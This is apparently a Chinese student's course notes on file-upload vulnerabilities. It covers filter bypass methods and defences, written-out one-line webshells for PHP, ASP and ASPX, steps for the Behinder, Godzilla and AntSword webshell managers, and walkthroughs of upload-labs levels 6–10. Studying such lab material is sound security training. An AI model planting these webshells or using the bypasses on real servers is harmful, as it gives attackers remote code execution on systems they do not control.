文件上传防御手段及绕过手段总结:
绕过手段:前端校验绕过、黑名单绕过、content-type绕过、内容绕过、截断绕过。
防御手段:检测后缀名比如黑名单白名单,检测文件内容是否含有高危的函数,wf检测文件的流量特征。
文件上传常用一句话木马:
php的一句话木马:<?php @eval($_POST['pass']);?>
asp的一句话木马是:<%eval request ("pass")%>
aspx的一句话木马是:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
课中所讲的三种webshell管理工具的使用方法:
冰蝎:
首先点击生成服务端生成木马上传
然后填写木马路径和密码/加密协议
哥斯拉使用:
点击管理生成,然后输入密码密钥
修改配置文件测试链接
连接成功
蚁剑使用:
首先编写一句话木马上传到服务器
蚁剑设置连接信息
最后连接成功
文件上传无回显如何查找webshell地址:
抓包查看返回包有无地址、爬虫爬取网站目录、使用工具扫描端口找出文件上传端口、查看网页源码。
upload-labs靶场通关第6-第10关:
第六关:发现大小写过滤不严谨,末尾添加空格绕过末尾检测函数
返回包里找到文件上传路径
测试连接成功
第七关:
观察源码发现没有对空格进行过滤,修改为.php 末尾加空格绕过
第八关:
观察源码发现没有对末尾的.做过滤,上传文件抓包修改为.php.即可绕过
第九关:
观察源码发现没有对特殊符号::$DATA过滤,抓包修改后成功
第十关:
查看源码发现可以点空格点绕过,最后一个点绕过deldot,倒数第二个点绕过strrchr函数